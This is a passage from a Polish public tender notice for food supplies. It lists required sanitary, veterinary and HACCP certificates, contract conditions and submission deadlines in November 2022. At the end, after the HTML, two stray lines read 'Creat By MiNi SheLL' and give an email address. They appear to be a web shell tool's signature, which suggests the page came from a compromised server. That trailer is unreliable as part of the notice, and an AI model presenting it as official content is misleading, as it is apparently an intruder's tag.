niezwierzęcego i produkty pochodzenia zwierzęcego: <br/>a) aktualną decyzję państwowego powiatowego inspektora sanitarnego o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia, o której mowa w art. 61 i 62 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz.U. z 2022r. poz.2132 t.j.) – jeżeli ustawa nakłada obowiązek posiadania takich uprawnień, <br/>lub <br/>b) aktualną decyzję państwowego powiatowego inspektora weterynaryjnego <br/>o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia, o której mowa w art.20 ustawy z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz.U. z 2020r. poz.1753 t.j.)– jeżeli ustawa nakłada obowiązek posiadania takich uprawnień,<br/>lub<br/>c) zaświadczenie o wpisie do rejestru zakładów wydane przez organa urzędowej kontroli na podstawie art. 62 ust. 1 pkt 4 ustawy z dnia 25 sierpnia 2006r. <br/>o bezpieczeństwie żywności i żywienia (Dz.U. z 2022r. poz. 2132 t.j.) – jeżeli ustawa nakłada obowiązek posiadania takich uprawnień.<br/>- W przypadku, gdy ofertę składa Wykonawca z Unii Europejskiej, spoza obszaru RP, w odpowiedzi na wezwanie należy złożyć aktualną decyzję wydaną przez właściwy organ danego kraju o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących tę część zamówienia wraz z weterynaryjnym numerem identyfikacyjnym w przypadku dotyczącym żywności (grupy produktów) pochodzenia zwierzęcego.<br/>- W przypadku, gdy ofertę składa Wykonawca z krajów trzecich, w odpowiedzi na wezwanie należy złożyć aktualną decyzję wydaną przez właściwy organ w danym kraju o dopuszczeniu zakładu do produkcji i na eksport na rynki innych krajów (w tym krajów Unii Europejskiej) w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących tę część zamówienia.<br/>- Potwierdzenie o zgłoszeniu działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi wydane przez wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych, właściwego ze względu na miejsce zamieszkania lub siedzibę Wykonawcy– na podstawie art. 12 ust. 1 ustawy z dnia 21 grudnia 2000r. o jakości handlowej artykułów rolno-spożywczych (Dz.U. z 2022r. poz.1688 t.j. ze zm.) – jeżeli ustawa nakłada obowiązek posiadania takich uprawnień.<br/>W zakresie potwierdzenia braku podstaw wykluczenia Wykonawcy z postępowania:<br/>2. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Prawo zamówień publicznych, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>Zamawiający nie wezwie do złożenia podmiotowych środków dowodowych, jeżeli można je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskaże w oświadczeniu, o którym mowa w pkt 1.1, dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.W celu potwierdzenia, że oferowane dostawy spełniają określone przez Zamawiającego wymagania oraz cechy, Zamawiający wymaga złożenia następujących przedmiotowych środków dowodowych:<br/>- Zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP wystawione nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert.<br/>Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP– podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2022r. poz. 2132 t.j.). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia. art. 107 ust . 2 ustawy Prawo zamówień publicznych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza wprowadzenie zmian umowy w sytuacjach określonych art. 455 ustawy Prawo zamówień publicznych oraz w załączniku nr 4 do SWZ - wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-25 07:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/2rblog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-25 07:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com